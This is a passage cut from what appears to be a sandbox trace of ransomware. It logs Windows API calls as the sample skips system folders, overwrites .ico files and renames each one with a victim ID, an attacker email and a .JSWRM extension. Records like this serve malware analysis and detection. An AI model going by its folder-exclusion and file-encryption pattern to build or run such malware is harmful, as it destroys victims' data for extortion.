lpWideCharStr=0x22d490, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0060.506] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0060.506] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0060.506] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0060.506] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0060.506] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0060.506] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0060.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232f58 [0060.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0060.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232f58 | out: hHeap=0x1e0000) returned 1 [0060.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd4) returned 0x1fc808 [0060.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0060.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0060.507] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate6.ico"), lpNewFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate6.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0060.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0060.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0060.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232b48 | out: hHeap=0x1e0000) returned 1 [0060.507] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0xfffffffe, dwReserved1=0x345f4c0, cFileName="Rotate7.ico", cAlternateFileName="")) returned 1 [0060.507] lstrcmpiW (lpString1="Rotate7.ico", lpString2=".") returned 1 [0060.507] lstrcmpiW (lpString1="Rotate7.ico", lpString2="..") returned 1 [0060.507] lstrcmpiW (lpString1="Rotate7.ico", lpString2="...") returned 1 [0060.508] lstrcmpiW (lpString1="Rotate7.ico", lpString2="windows") returned -1 [0060.508] lstrcmpiW (lpString1="Rotate7.ico", lpString2="recovery") returned 1 [0060.508] lstrcmpiW (lpString1="Rotate7.ico", lpString2="perflogs") returned 1 [0060.508] lstrcmpiW (lpString1="Rotate7.ico", lpString2="documents and settings") returned 1 [0060.508] lstrcmpiW (lpString1="Rotate7.ico", lpString2="$RECYCLE.BIN") returned 1 [0060.508] lstrcmpiW (lpString1="Rotate7.ico", lpString2="system volume information") returned -1 [0060.508] lstrcmpiW (lpString1="Rotate7.ico", lpString2="msocache") returned 1 [0060.508] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f98 [0060.508] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Rotate7.ico", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0060.508] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Rotate7.ico", cchWideChar=11, lpMultiByteStr=0x345f610, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Rotate7.ico", lpUsedDefaultChar=0x0) returned 11 [0060.508] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f98 | out: hHeap=0x1e0000) returned 1 [0060.508] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0060.508] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Rotate7.ico", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0060.508] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Rotate7.ico", cchWideChar=11, lpMultiByteStr=0x345f5e0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Rotate7.ico", lpUsedDefaultChar=0x0) returned 11 [0060.508] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0060.508] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ef0 [0060.508] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2331c8 | out: hHeap=0x1e0000) returned 1 [0060.508] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0060.508] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0060.508] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e20 [0060.508] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate7.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0060.508] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=894) returned 1 [0060.508] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.508] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x370) returned 0x203550 [0060.508] ReadFile (in: hFile=0x3d4, lpBuffer=0x203550, nNumberOfBytesToRead=0x370, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesRead=0x345f2d4*=0x370, lpOverlapped=0x0) returned 1 [0060.510] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.510] WriteFile (in: hFile=0x3d4, lpBuffer=0x203550*, nNumberOfBytesToWrite=0x370, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesWritten=0x345f2d0*=0x370, lpOverlapped=0x0) returned 1 [0060.510] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x203550 | out: hHeap=0x1e0000) returned 1 [0060.510] CloseHandle (hObject=0x3d4) returned 1 [0060.510] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2331c8 [0060.510] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0060.511] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0060.511] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d4c8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0060.511] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0060.511] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0060.511] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0060.511] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0060.511] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0060.511] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0060.511] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0060.511] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0060.511] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0060.511] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd4) returned 0x1fc808 [0060.511] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0060.511] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0060.511] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate7.ico"), lpNewFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate7.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0060.511] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0060.512] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2331c8 | out: hHeap=0x1e0000) returned 1 [0060.512] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e20 | out: hHeap=0x1e0000) returned 1 [0060.512] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0xfffffffe, dwReserved1=0x345f4c0, cFileName="Rotate8.ico", cAlternateFileName="")) returned 1 [0060.512] lstrcmpiW (lpString1="Rotate8.ico", lpString2=".") returned 1 [0060.512] lstrcmpiW (lpString1="Rotate8.ico", lpString2="..") returned 1 [0060.512] lstrcmpiW (lpString1="Rotate8.ico", lpString2="...") returned 1 [0060.512] lstrcmpiW (lpString1="Rotate8.ico", lpString2="windows") returned -1 [0060.512] lstrcmpiW (lpString1="Rotate8.ico", lpString2="recovery") returned 1 [0060.512] lstrcmpiW (lpString1="Rotate8.ico", lpString2="perflogs") returned 1 [0060.512] lstrcmpiW (lpString1="Rotate8.ico", lpString2="documents and settings") returned 1 [0060.512] lstrcmpiW (lpString1="Rotate8.ico", lpString2="$RECYCLE.BIN") returned 1 [0060.512] lstrcmpiW (lpString1="Rotate8.ico", lpString2="system volume information") returned -1 [0060.512] lstrcmpiW (lpString1="Rotate8.ico", lpString2="msocache") returned 1 [0060.512] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0060.512] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Rotate8.ico", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0060.512] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Rotate8.ico", cchWideChar=11, lpMultiByteStr=0x345f610, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Rotate8.ico", lpUsedDefaultChar=0x0) returned 11 [0060.512] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0060.512] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0060.512] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Rotate8.ico", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0060.512] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Rotate8.ico", cchWideChar=11, lpMultiByteStr=0x345f5e0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Rotate8.ico", lpUsedDefaultChar=0x0) returned 11 [0060.512] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0060.512] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ae0 [0060.512] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ef0 | out: hHeap=0x1e0000) returned 1 [0060.512] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0060.512] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0060.512] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232f58 [0060.512] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate8.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0060.513] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=894) returned 1 [0060.513] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.513] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x370) returned 0x203550 [0060.513] ReadFile (in: hFile=0x3d4, lpBuffer=0x203550, nNumberOfBytesToRead=0x370, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesRead=0x345f2d4*=0x370, lpOverlapped=0x0) returned 1 [0060.514] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.514] WriteFile (in: hFile=0x3d4, lpBuffer=0x203550*, nNumberOfBytesToWrite=0x370, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesWritten=0x345f2d0*=0x370, lpOverlapped=0x0) returned 1 [0060.515] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x203550 | out: hHeap=0x1e0000) returned 1 [0060.515] CloseHandle (hObject=0x3d4) returned 1 [0060.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232b48 [0060.515] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0060.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0060.515] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d458, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0060.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0060.515] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0060.515] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0060.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0060.515] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0060.516] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0060.516] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0060.516] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0060.516] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0060.516] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd4) returned 0x1fc808 [0060.516] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0060.516] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0060.516] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate8.ico"), lpNewFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate8.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0060.517] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0060.517] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232b48 | out: hHeap=0x1e0000) returned 1 [0060.517] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232f58 | out: hHeap=0x1e0000) returned 1 [0060.517] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x47e, dwReserved0=0xfffffffe, dwReserved1=0x345f4c0, cFileName="Save.ico", cAlternateFileName="")) returned 1 [0060.517] lstrcmpiW (lpString1="Save.ico", lpString2=".") returned 1 [0060.517] lstrcmpiW (lpString1="Save.ico", lpString2="..") returned 1 [0060.517] lstrcmpiW (lpString1="Save.ico", lpString2="...") returned 1 [0060.517] lstrcmpiW (lpString1="Save.ico", lpString2="windows") returned -1 [0060.517] lstrcmpiW (lpString1="Save.ico", lpString2="recovery") returned 1 [0060.517] lstrcmpiW (lpString1="Save.ico", lpString2="perflogs") returned 1 [0060.517] lstrcmpiW (lpString1="Save.ico", lpString2="documents and settings") returned 1 [0060.517] lstrcmpiW (lpString1="Save.ico", lpString2="$RECYCLE.BIN") returned 1 [0060.517] lstrcmpiW (lpString1="Save.ico", lpString2="system volume information") returned -1 [0060.517] lstrcmpiW (lpString1="Save.ico", lpString2="msocache") returned 1 [0060.517] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0060.517] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Save.ico", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0060.517] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Save.ico", cchWideChar=8, lpMultiByteStr=0x345f610, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Save.ico", lpUsedDefaultChar=0x0) returned 8 [0060.517] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0060.517] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0060.517] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Save.ico", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0060.517] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Save.ico", cchWideChar=8, lpMultiByteStr=0x345f5e0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Save.ico", lpUsedDefaultChar=0x0) returned 8 [0060.517] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0060.517] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c068 [0060.517] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ae0 | out: hHeap=0x1e0000) returned 1 [0060.517] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0060.517] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0060.517] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7f8 [0060.517] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Save.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\save.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0060.518] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=1150) returned 1 [0060.518] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.518] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x470) returned 0x203550 [0060.518] ReadFile (in: hFile=0x3d4, lpBuffer=0x203550, nNumberOfBytesToRead=0x470, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesRead=0x345f2d4*=0x470, lpOverlapped=0x0) returned 1 [0060.584] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.584] WriteFile (in: hFile=0x3d4, lpBuffer=0x203550*, nNumberOfBytesToWrite=0x470, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesWritten=0x345f2d0*=0x470, lpOverlapped=0x0) returned 1 [0060.584] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x203550 | out: hHeap=0x1e0000) returned 1 [0060.584] CloseHandle (hObject=0x3d4) returned 1 [0060.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c380 [0060.585] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0060.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0060.585] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d4c8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0060.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0060.585] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0060.585] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0060.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0060.585] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0060.585] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0060.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ce8 [0060.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0060.585] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ce8 | out: hHeap=0x1e0000) returned 1 [0060.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd4) returned 0x1fc808 [0060.585] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0060.585] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0060.585] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\Graphics\\Save.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\save.ico"), lpNewFileName="C:\\588bce7c90097ed212\\Graphics\\Save.ico.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\graphics\\save.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0060.587] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, 